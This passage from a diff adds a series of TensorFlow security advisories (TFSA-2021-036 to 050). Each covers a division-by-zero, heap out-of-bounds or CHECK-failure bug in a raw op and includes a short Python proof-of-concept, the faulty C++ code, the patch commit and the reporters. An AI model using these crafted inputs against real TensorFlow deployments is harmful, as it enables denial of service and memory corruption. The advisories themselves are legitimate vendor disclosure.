v_min = tf.constant([], shape=[0], dtype=tf.float32)
v_max = tf.constant([], shape=[0], dtype=tf.float32)
beta = tf.constant([1], shape=[1], dtype=tf.quint8)
beta_min = tf.constant([], shape=[0], dtype=tf.float32)
beta_max = tf.constant([], shape=[0], dtype=tf.float32)
gamma = tf.constant([1], shape=[1], dtype=tf.quint8)
gamma_min = tf.constant([], shape=[0], dtype=tf.float32)
gamma_max = tf.constant([], shape=[0], dtype=tf.float32)
tf.raw_ops.QuantizedBatchNormWithGlobalNormalization(
t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max,
v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min,
beta_max=beta_max, gamma=gamma, gamma_min=gamma_min,
gamma_max=gamma_max, out_type=tf.qint32,
variance_epsilon=0.1, scale_after_normalization=True)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc#L176-L189)
assumes the inputs are not empty:
```cc
const float input_min = context->input(1).flat<float>()(0);
const float input_max = context->input(2).flat<float>()(0);
...
const float mean_min = context->input(4).flat<float>()(0);
const float mean_max = context->input(5).flat<float>()(0);
...
const float var_min = context->input(7).flat<float>()(0);
const float var_max = context->input(8).flat<float>()(0);
...
const float beta_min = context->input(10).flat<float>()(0);
const float beta_max = context->input(11).flat<float>()(0);
...
const float gamma_min = context->input(13).flat<float>()(0);
const float gamma_max = context->input(14).flat<float>()(0);
```
If any of these inputs is empty, `.flat<T>()` is an empty buffer, so accessing
the element at index 0 is accessing data outside of bounds.
### Patches
We have patched the issue in GitHub commit
[d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b](https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,59 @@
## TFSA-2021-036: Division by 0 in `QuantizedBatchNormWithGlobalNormalization`
### CVE Number
CVE-2021-29548
### Impact
An attacker can cause a runtime division by zero error and denial of service in
`tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`:
```python
import tensorflow as tf
t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, dtype=tf.float32)
beta_max = tf.constant(-10.0, dtype=tf.float32)
gamma = tf.constant([], shape=[0], dtype=tf.quint8)
gamma_min = tf.constant(-10.0, dtype=tf.float32)
gamma_max = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBatchNormWithGlobalNormalization(
t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max,
v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min,
beta_max=beta_max, gamma=gamma, gamma_min=gamma_min,
gamma_max=gamma_max, out_type=tf.qint32,
variance_epsilon=0.1, scale_after_normalization=True)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc)
does not validate all constraints specified in the [op's
contract](https://www.tensorflow.org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization).
### Patches
We have patched the issue in GitHub commit
[d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b](https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,61 @@
## TFSA-2021-037: Division by 0 in `QuantizedAdd`
### CVE Number
CVE-2021-29549
### Impact
An attacker can cause a runtime division by zero error and denial of service in
`tf.raw_ops.QuantizedAdd`:
```python
import tensorflow as tf
x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8)
y = tf.constant([], shape=[2, 0], dtype=tf.quint8)
min_x = tf.constant(10.723421015884028)
max_x = tf.constant(15.19578006631113)
min_y = tf.constant(-5.539003866682977)
max_y = tf.constant(42.18819949559947)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L289-L295)
computes a modulo operation without validating that the divisor is not zero.
```cc
void VectorTensorAddition(const T* vector_data, float min_vector,
float max_vector, int64 vector_num_elements,
const T* tensor_data, float min_tensor,
float max_tensor, int64 tensor_num_elements,
float output_min, float output_max, Toutput* output) {
for (int i = 0; i < tensor_num_elements; ++i) {
const int64 vector_i = i % vector_num_elements;
...
}
}
```
Since `vector_num_elements` is [determined based on input
shapes](https://github.com/tensorflow/tensorflow/blob/6f26b3f3418201479c264f2a02000880d8df151c/tensorflow/core/kernels/quantized_add_op.cc#L522-L544),
a user can trigger scenarios where this quantity is 0.
### Patches
We have patched the issue in GitHub commit
[744009c9e5cc5d0447f0dc39d055f917e1fd9e16](https://github.com/tensorflow/tensorflow/commit/744009c9e5cc5d0447f0dc39d055f917e1fd9e16).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,79 @@
## TFSA-2021-038: Division by 0 in `FractionalAvgPool`
### CVE Number
CVE-2021-29550
### Impact
An attacker can cause a runtime division by zero error and denial of service in
`tf.raw_ops.FractionalAvgPool`:
```python
import tensorflow as tf
value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32)
pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0]
pseudo_random = False
overlapping = False
deterministic = False
seed = 0
seed2 = 0
tf.raw_ops.FractionalAvgPool(
value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L85-L89)
computes a divisor quantity by dividing two user controlled values:
```cc
for (int i = 0; i < tensor_in_and_out_dims; ++i) {
output_size[i] = static_cast<int>(std::floor(input_size[i] / pooling_ratio_[i]));
DCHECK_GT(output_size[i], 0);
}
```
The user controls the values of `input_size[i]` and `pooling_ratio_[i]` (via the
`value.shape()` and `pooling_ratio` arguments). If the value in `input_size[i]`
is smaller than the `pooling_ratio_[i]`, then the floor operation results in
`output_size[i]` being 0. The `DCHECK_GT` line is a no-op outside of debug mode,
so in released versions of TF this does not trigger.
Later, these computed values [are used as
arguments](https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L96-L99)
to
[`GeneratePoolingSequence`](https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_pool_common.cc#L100-L108).
There, the first computation is a division in a modulo operation:
```cc
std::vector<int64> GeneratePoolingSequence(int input_length, int output_length,
GuardedPhiloxRandom* generator,
bool pseudo_random) {
...
if (input_length % output_length == 0) {
diff = std::vector<int64>(output_length, input_length / output_length);
}
...
}
```
Since `output_length` can be 0, this results in runtime crashing.
### Patches
We have patched the issue in GitHub commit
[548b5eaf23685d86f722233d8fbc21d0a4aecb96](https://github.com/tensorflow/tensorflow/commit/548b5eaf23685d86f722233d8fbc21d0a4aecb96).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,71 @@
## TFSA-2021-039: OOB read in `MatrixTriangularSolve`
### CVE Number
CVE-2021-29551
### Impact
The implementation of
[`MatrixTriangularSolve`](https://github.com/tensorflow/tensorflow/blob/8cae746d8449c7dda5298327353d68613f16e798/tensorflow/core/kernels/linalg/matrix_triangular_solve_op_impl.h#L160-L240)
fails to terminate kernel execution if one validation condition fails:
```cc
void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0,
const Tensor& in1) override {
OP_REQUIRES(
ctx, in0.dims() >= 2,
errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims()));
OP_REQUIRES(
ctx, in1.dims() >= 2,
errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims()));
}
void Compute(OpKernelContext* ctx) override {
const Tensor& in0 = ctx->input(0);
const Tensor& in1 = ctx->input(1);
ValidateInputTensors(ctx, in0, in1);
MatMulBCast bcast(in0.shape().dim_sizes(), in1.shape().dim_sizes());
...
}
```
Since `OP_REQUIRES` only sets `ctx->status()` to a non-OK value and calls
`return`, this allows malicious attackers to trigger an out of bounds read:
```python
import tensorflow as tf
import numpy as np
matrix_array = np.array([])
matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(1,0)),dtype=tf.float32)
rhs_array = np.array([])
rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(0,1)),dtype=tf.float32)
tf.raw_ops.MatrixTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor,lower=False,adjoint=False)
```
As the two input tensors are empty, the `OP_REQUIRES` in `ValidateInputTensors`
should fire and interrupt execution. However, given the implementation of
`OP_REQUIRES`, after the `in0.dims() >= 2` fails, execution moves to the
initialization of the `bcast` object. This initialization is done with invalid
data and results in heap OOB read.
### Patches
We have patched the issue in GitHub commit
[480641e3599775a8895254ffbc0fc45621334f68](https://github.com/tensorflow/tensorflow/commit/480641e3599775a8895254ffbc0fc45621334f68).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ye Zhang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,42 @@
## TFSA-2021-040: Heap OOB in `QuantizeAndDequantizeV3`
### CVE Number
CVE-2021-29553
### Impact
An attacker can read data outside of bounds of heap allocated buffer in
`tf.raw_ops.QuantizeAndDequantizeV3`:
```python
import tensorflow as tf
tf.raw_ops.QuantizeAndDequantizeV3(
input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30],
signed_input=False, range_given=False, narrow_range=False, axis=3)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/11ff7f80667e6490d7b5174aa6bf5e01886e770f/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L237)
does not validate the value of user supplied `axis` attribute before using it to
index in the array backing the `input` argument:
```cc
const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);
```
### Patches
We have patched the issue in GitHub commit
[99085e8ff02c3763a0ec2263e44daec416f6a387](https://github.com/tensorflow/tensorflow/commit/99085e8ff02c3763a0ec2263e44daec416f6a387).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Aivul Team from Qihoo 360.
@@ -0,0 +1,52 @@
## TFSA-2021-041: `CHECK`-failure in `UnsortedSegmentJoin`
### CVE Number
CVE-2021-29552
### Impact
An attacker can cause a denial of service by controlling the values of
`num_segments` tensor argument for `UnsortedSegmentJoin`:
```python
import tensorflow as tf
inputs = tf.constant([], dtype=tf.string)
segment_ids = tf.constant([], dtype=tf.int32)
num_segments = tf.constant([], dtype=tf.int32)
separator = ''
tf.raw_ops.UnsortedSegmentJoin(
inputs=inputs, segment_ids=segment_ids,
num_segments=num_segments, separator=separator)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/a2a607db15c7cd01d754d37e5448d72a13491bdb/tensorflow/core/kernels/unsorted_segment_join_op.cc#L92-L93)
assumes that the `num_segments` tensor is a valid scalar:
```cc
const Tensor& num_segments_tensor = context->input(2);
auto num_segments = num_segments_tensor.scalar<NUM_SEGMENTS_TYPE>()();
```
Since the tensor is empty the `CHECK` involved in `.scalar<T>()()` that checks
that the number of elements is exactly 1 will be invalidated and this would
result in process termination.
### Patches
We have patched the issue in GitHub commit
[704866eabe03a9aeda044ec91a8d0c83fc1ebdbe](https://github.com/tensorflow/tensorflow/commit/704866eabe03a9aeda044ec91a8d0c83fc1ebdbe).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,51 @@
## TFSA-2021-042: Division by 0 in `DenseCountSparseOutput`
### CVE Number
CVE-2021-29554
### Impact
An attacker can cause a denial of service via a FPE runtime error in
`tf.raw_ops.DenseCountSparseOutput`:
```python
import tensorflow as tf
values = tf.constant([], shape=[0, 0], dtype=tf.int64)
weights = tf.constant([])
tf.raw_ops.DenseCountSparseOutput(
values=values, weights=weights,
minlength=-1, maxlength=58, binary_output=True)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/efff014f3b2d8ef6141da30c806faf141297eca1/tensorflow/core/kernels/count_ops.cc#L123-L127)
computes a divisor value from user data but does not check that the result is 0
before doing the division:
```cc
int num_batch_elements = 1;
for (int i = 0; i < num_batch_dimensions; ++i) {
num_batch_elements *= data.shape().dim_size(i);
}
int num_value_elements = data.shape().num_elements() / num_batch_elements;
```
Since `data` is given by the `values` argument, `num_batch_elements` is 0.
### Patches
We have patched the issue in GitHub commit
[da5ff2daf618591f64b2b62d9d9803951b945e9f](https://github.com/tensorflow/tensorflow/commit/da5ff2daf618591f64b2b62d9d9803951b945e9f).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, and TensorFlow 2.3.3, as these are also affected.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,58 @@
## TFSA-2021-043: Division by 0 in `FusedBatchNorm`
### CVE Number
CVE-2021-29555
### Impact
An attacker can cause a denial of service via a FPE runtime error in
`tf.raw_ops.FusedBatchNorm`:
```python
import tensorflow as tf
x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32)
scale = tf.constant([], shape=[0], dtype=tf.float32)
offset = tf.constant([], shape=[0], dtype=tf.float32)
mean = tf.constant([], shape=[0], dtype=tf.float32)
variance = tf.constant([], shape=[0], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/828f346274841fa7505f7020e88ca36c22e557ab/tensorflow/core/kernels/fused_batch_norm_op.cc#L295-L297)
performs a division based on the last dimension of the `x` tensor:
```cc
const int depth = x.dimension(3);
const int rest_size = size / depth;
```
Since this is controlled by the user, an attacker can trigger a denial of
service.
### Patches
We have patched the issue in GitHub commit
[1a2a87229d1d61e23a39373777c056161eb4084d](https://github.com/tensorflow/tensorflow/commit/1a2a87229d1d61e23a39373777c056161eb4084d).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,39 @@
## TFSA-2021-044: Division by 0 in `SparseMatMul`
### CVE Number
CVE-2021-29557
### Impact
An attacker can cause a denial of service via a FPE runtime error in
`tf.raw_ops.SparseMatMul`:
```python
import tensorflow as tf
a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32)
b = tf.constant([], shape=[0, 2], dtype=tf.float32)
tf.raw_ops.SparseMatMul(
a=a, b=b, transpose_a=True, transpose_b=True,
a_is_sparse=True, b_is_sparse=True)
```
The division by 0 occurs deep in Eigen code because the `b` tensor is empty.
### Patches
We have patched the issue in GitHub commit
[7f283ff806b2031f407db64c4d3edcda8fb9f9f5](https://github.com/tensorflow/tensorflow/commit/7f283ff806b2031f407db64c4d3edcda8fb9f9f5).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,47 @@
## TFSA-2021-045: Division by 0 in `Reverse`
### CVE Number
CVE-2021-29556
### Impact
An attacker can cause a denial of service via a FPE runtime error in
`tf.raw_ops.Reverse`:
```python
import tensorflow as tf
tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32)
dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool)
tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/36229ea9e9451dac14a8b1f4711c435a1d84a594/tensorflow/core/kernels/reverse_op.cc#L75-L76)
performs a division based on the first dimension of the tensor argument:
```cc
const int64 N = input.dim_size(0);
const int64 cost_per_unit = input.NumElements() / N;
```
Since this is controlled by the user, an attacker can trigger a denial of
service.
### Patches
We have patched the issue in GitHub commit
[4071d8e2f6c45c1955a811fee757ca2adbe462c1](https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,50 @@
## TFSA-2021-046: Heap buffer overflow in `SparseSplit`
### CVE Number
CVE-2021-29558
### Impact
An attacker can cause a heap buffer overflow in `tf.raw_ops.SparseSplit`:
```python
import tensorflow as tf
shape_dims = tf.constant(0, dtype=tf.int64)
indices = tf.ones([1, 1], dtype=tf.int64)
values = tf.ones([1], dtype=tf.int64)
shape = tf.ones([1], dtype=tf.int64)
tf.raw_ops.SparseSplit(
split_dim=shape_dims, indices=indices, values=values,
shape=shape, num_split=1)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/699bff5d961f0abfde8fa3f876e6d241681fbef8/tensorflow/core/util/sparse/sparse_tensor.h#L528-L530)
accesses an array element based on a user controlled offset:
```cc
const int dim = input_tensor.indices().matrix<int64>()(i, split_dim);
int slice_index = GetSliceIndex(dim, split_size, residual);
num_values[slice_index]++;
```
This results in overriding values on the heap.
### Patches
We have patched the issue in GitHub commit
[8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31](https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,43 @@
## TFSA-2021-047: Heap OOB access in unicode ops
### CVE Number
CVE-2021-29559
### Impact
An attacker can access data outside of bounds of heap allocated array in
`tf.raw_ops.UnicodeEncode`:
```python
import tensorflow as tf
input_values = tf.constant([58], shape=[1], dtype=tf.int32)
input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32)
output_encoding = "UTF-8"
tf.raw_ops.UnicodeEncode(
input_values=input_values, input_splits=input_splits,
output_encoding=output_encoding)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/472c1f12ad9063405737679d4f6bd43094e1d36d/tensorflow/core/kernels/unicode_ops.cc)
assumes that the `input_value`/`input_splits` pair specify a valid sparse
tensor.
### Patches
We have patched the issue in GitHub commit
[51300ba1cc2f487aefec6e6631fef03b0e08b298](https://github.com/tensorflow/tensorflow/commit/51300ba1cc2f487aefec6e6631fef03b0e08b298).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,67 @@
## TFSA-2021-048: Heap buffer overflow in `RaggedTensorToTensor`
### CVE Number
CVE-2021-29560
### Impact
An attacker can cause a heap buffer overflow in
`tf.raw_ops.RaggedTensorToTensor`:
```python
import tensorflow as tf
shape = tf.constant([10, 10], shape=[2], dtype=tf.int64)
values = tf.constant(0, shape=[1], dtype=tf.int64)
default_value = tf.constant(0, dtype=tf.int64)
l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
row = tf.constant(l, shape=[5, 43], dtype=tf.int64)
rows = [row]
types = ['ROW_SPLITS']
tf.raw_ops.RaggedTensorToTensor(
shape=shape, values=values, default_value=default_value,
row_partition_tensors=rows, row_partition_types=types)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/d94227d43aa125ad8b54115c03cece54f6a1977b/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L219-L222)
uses the same index to access two arrays in parallel:
```cc
for (INDEX_TYPE i = 0; i < row_split_size - 1; ++i) {
INDEX_TYPE row_length = row_split(i + 1) - row_split(i);
INDEX_TYPE real_length = std::min(output_size, row_length);
INDEX_TYPE parent_output_index_current = parent_output_index[i];
...
}
```
Since the user controls the shape of the input arguments, an attacker could
trigger a heap OOB access when `parent_output_index` is shorter than
`row_split`.
### Patches
We have patched the issue in GitHub commit
[a84358aa12f0b1518e606095ab9cfddbf597c121](https://github.com/tensorflow/tensorflow/commit/a84358aa12f0b1518e606095ab9cfddbf597c121).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu
X-Team.
@@ -0,0 +1,53 @@
## TFSA-2021-049: `CHECK`-fail in `LoadAndRemapMatrix`
### CVE Number
CVE-2021-29561
### Impact
An attacker can cause a denial of service by exploiting a `CHECK`-failure coming
from `tf.raw_ops.LoadAndRemapMatrix`:
```python
import tensorflow as tf
ckpt_path = tf.constant([], shape=[0], dtype=tf.string)
old_tensor_name = tf.constant("")
row_remapping = tf.constant([], shape=[0], dtype=tf.int64)
col_remapping = tf.constant([1], shape=[1], dtype=tf.int64)
initializing_values = tf.constant(1.0)
tf.raw_ops.LoadAndRemapMatrix(
ckpt_path=ckpt_path, old_tensor_name=old_tensor_name,
row_remapping=row_remapping, col_remapping=col_remapping,
initializing_values=initializing_values, num_rows=0, num_cols=1)
```
This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/d94227d43aa125ad8b54115c03cece54f6a1977b/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L219-L222)
assumes that the `ckpt_path` is always a valid scalar.
```cc
const string& ckpt_path = ckpt_path_t->scalar<tstring>()();
```
However, an attacker can send any other tensor as the first argument of
`LoadAndRemapMatrix`. This would cause the rank `CHECK` in `scalar<T>()()` to
trigger and terminate the process.
### Patches
We have patched the issue in GitHub commit
[77dd114513d7796e1e2b8aece214a380af26fbf4](https://github.com/tensorflow/tensorflow/commit/77dd114513d7796e1e2b8aece214a380af26fbf4).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu
X-Team.
@@ -0,0 +1,41 @@
## TFSA-2021-050: `CHECK`-fail in `tf.raw_ops.IRFFT`
### CVE Number
CVE-2021-29562
### Impact
An attacker can cause a denial of service by exploiting a `CHECK`-failure coming
from the implementation of `tf.raw_ops.IRFFT`:
```python
import tensorflow as tf
values = [-10.0] * 130
values[0] = -9.999999999999995
inputs = tf.constant(values, shape=[10, 13], dtype=tf.float32)
inputs = tf.cast(inputs, dtype=tf.complex64)
fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
tf.raw_ops.IRFFT(input=inputs, fft_length=fft_length)
```
The above example causes Eigen code to operate on an empty matrix. This triggers
on an assertion and causes program termination.
### Patches
We have patched the issue in GitHub commit
[1c56f53be0b722ca657cbc7df461ed676c8642a2](https://github.com/tensorflow/tensorflow/commit/1c56f53be0b722ca657cbc7df461ed676c8642a2).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.
### Attribution
